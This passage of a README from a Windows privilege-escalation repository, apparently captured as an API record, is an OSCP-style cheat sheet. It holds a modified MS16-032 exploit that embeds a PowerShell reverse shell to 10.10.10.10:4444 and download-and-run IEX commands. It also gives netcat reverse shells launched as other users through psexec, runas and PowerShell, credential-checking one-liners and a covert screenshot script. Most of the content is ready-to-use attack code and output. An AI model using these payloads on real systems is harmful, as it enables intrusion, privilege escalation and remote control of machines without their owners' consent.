\n\t\t\t'-NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026{$client = New-Object System.Net.Sockets.TCPClient(\\\"10.10.10.10\\\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + \\\"PS \\\" + (pwd).Path + \\\"^\u003e \\\";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}\"',\n\t\t\t0x00000004, $null, $GetCurrentPath,\n\t\t\t[ref]$StartupInfo, [ref]$ProcessInfo)\n```\n\nOn the remote host execute the exploit:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-MS16-032.ps1'))\"\n```\nOr from a Windows Powershell:\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Invoke-MS16-032.ps1')\n```\nOr if you wanted to upload the exploit, you can always run it like this:\n```powershell\nPS C:\\\u003e powershell -ExecutionPolicy ByPass -command \"\u0026 { . C:\\Users\\Public\\Invoke-MS16-032.ps1; Invoke-MS16-032 }\"\n```\nOn our Kali machine we create the reverse shell and ... BOOM! Root dance.\n```\nroot@kali:~# nc -nlvp 4444\nlistening on [any] 4444 ...\nconnect to [10.10.10.11] from (UNKNOWN) [10.10.10.10] 49182\n\nPS C:\\Users\\jimmy^\u003e whoami\nnt authority\\system\n```\n\n## Windows Run As\nPrior to successfully performing a Windows run as, we of course need a valid windows username and password.\nHere is a oneliner powershell script to verify a username / password is valid on the local system:\n\nRequires .Net 3.5\n``` cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026{$username = '\u003cusername here\u003e'; $password = '\u003cpassword here\u003e'; $computer = $env:COMPUTERNAME; Add-Type -AssemblyName System.DirectoryServices.AccountManagement; $obj = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('machine',$computer); $obj.ValidateCredentials($username, $password); }\"\n```\nRequires .Net 2.0  \n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026{$username = '\u003cusername here\u003e'; $password = '\u003cpassword here\u003e'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Start-Process -FilePath C:\\Windows\\System32\\calc.exe -NoNewWindow -Credential $credential; }\"\n```\n\nSwitching users in linux is trival with the SU command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.\n\nSysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).\n\n```cmd\n C:\\\u003epsexec64 \\\\COMPUTERNAME -u Test -p test -h \"c:\\users\\public\\nc.exe -nc 192.168.1.10 4444 -e cmd.exe\" \n PsExec v2.2 - Execute processes remotely\n Copyright (C) 2001-2016 Mark Russinovich\n Sysinternals - www.sysinternals.com\n ```\n \nRunas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:\n```cmd\n C:\\\u003eC:\\Windows\\System32\\runas.exe /env /noprofile /user:Test \"c:\\users\\public\\nc.exe -nc 192.168.1.10 4444 -e cmd.exe\"\n Enter the password for Test:\n Attempting to start nc.exe as user \"COMPUTERNAME\\Test\" ...\n```\n\nPowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.\n```powershell\n $username = '\u003cusername here\u003e'\n $password = '\u003cpassword here\u003e'\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword\n Start-Process -FilePath C:\\Users\\Public\\nc.exe -NoNewWindow -Credential $credential -ArgumentList (\"-nc\",\"192.168.1.10\",\"4444\",\"-e\",\"cmd.exe\") -WorkingDirectory C:\\Users\\Public\n```\nNext run this script using powershell.exe:\n```cmd\nCMD C:\\\u003e powershell -ExecutionPolicy ByPass -command \"\u0026 { . C:\\Users\\public\\PowerShellRunAs.ps1; }\"\n```\n\n# Other files\nHere are few other handy scripts and things...\n\n## Capture a screen shot\nThe following powershell commands can be used to capture a screen shot of the remote computers desktop and store it as a BMP file.\n```powershell\nAdd-Type -AssemblyName System.Windows.Forms\nAdd-type -AssemblyName System.Drawing\n$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\n$bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height\n$graphic = [System.Drawing.Graphics]::FromImage($bitmap)\n$graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size)\n$bitmap.Save('screen1.bmp')\n```\nIf you are on CMD you can use this handy one-liner to execute the same powershell command\n```cmd\n@\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"Add-Type -AssemblyName System.Windows.Forms; Add-type -AssemblyName System.Drawing; $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height; $graphic = [System.Drawing.Graphics]::FromImage($bitmap); $graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size); $bitmap.Save('screen1.bmp')\"\n```\n\n**CopyAndPasteFileDownloader.bat**\n\nWindows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line)\n\n**CopyAndPasteEnum.bat**\n\nNo File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial).\nCopy and paste the following contents into your remote Windows shell in Kali to generate a quick report\n\n**enumeration.md** \n\nBasic notes on Windows Enumeration from the OSCP.\n\n**windows_recon.bat**\n\nAn uploadable batch file for performing basic windows enumeration.\n\n\n**References**  \nhttps://medium.com/@hakluke  \nhttps://daya.blog/2018/01/06/windows-privilege-escalation/  \nhttps://pentestlab.blog/2017/04/19/stored-credentials/   \nhttps://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/   \nhttps://www.abatchy.com/  \nhttps://gist.github.com/egre55  \nhttps://github.com/egre55/ultimate-file-transfer-list  \nhttps://lolbas-project.github.io/  \nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/  \nhttps://github.com/GhostPack/Seatbelt  \nhttps://github.com/rasta-mouse/Watson\nhttp://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html  \nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb  \n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrizb%2Fwindows-privilege-escalation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffrizb%2Fwindows-privilege-escalation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrizb%2Fwindows-privilege-escalation/lists"}